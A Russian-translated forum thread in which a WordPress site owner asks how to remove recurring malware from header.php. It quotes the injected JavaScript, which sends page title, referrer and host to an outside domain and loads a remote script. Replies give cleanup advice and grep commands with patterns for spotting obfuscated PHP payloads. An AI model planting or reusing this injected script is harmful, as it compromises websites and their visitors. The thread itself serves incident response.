2015-11-17 15 views
-1

Ищет помощь от любого, кто знаком с jquery Malware. Я был заражен Injected Script на моем веб-сайте WordPress, и каждый раз, когда я удаляю Injected Code из моего Header.php через 24 часа, он ввел модифицированную версию обратно в файлы Header.php на моем сервере хостинга.jQuery.min.php Вредоносное ПО на моем сайте

Вождение меня с ума. Сайт www.icrsolutions.co.uk и сценарий читает ниже:

<script> 
var a = ''; 
setTimeout(10); 
var default_keyword = encodeURIComponent(document.title); 
var se_referrer = encodeURIComponent(document.referrer); 
var host = encodeURIComponent(window.location.host); 
var base = "http://uniluxvfc.com/js/jquery.min.php"; 
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; 
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); 
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') { 
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>'); 
} 
</script> 
+0

изменить свои пароли. все они. – Alex

+0

Также убедитесь, что вы используете самую последнюю версию WordPress. У меня был старый сайт WP в подкаталоге на моем сайте (только для тестирования), забыли об этом, а год спустя парень сумел сделать что-то похожее на меня. К счастью, мой сайт предназначен только для беспорядков, ничего важного. Я закончил тем, что просто попросил парня, устраивающего его для меня, удалить все; файлы, базы данных и т. д. –

+0

вы используете wordpress; скорее всего, плохой/устаревший плагин –

ответ

1

Изменить каждый пароль, а затем удалить скрипты/вредоносный код.

Затем после этого обновите каждый плагин и сделайте сам Wordpress.

4

Следующая информация относится к Joomla, а также:

  1. Изменить все ваши пароли.
  2. Обновите свою установку и все дополнения или модули до последних версий.
  3. Определите и очистите все файлы, содержащие вредоносный скрипт. В Linux вы можете найти следующие файлы: grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
  4. Очистить все файлы, содержащие любую «полезную нагрузку». В Linux вы можете использовать следующие файлы для идентификации этих файлов. Там будут ложные срабатывания, поэтому, если у вас есть сомнения, проверьте файл на новую копию вашей CMS. egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
+0

Я использовал их только в файлах индексных файлов, может быть полезно кому-то, это быстрый способ их перечислить: find ./ -type f -name index.php -exec grep -l 'jquery.min.php' {} \; – sr9yar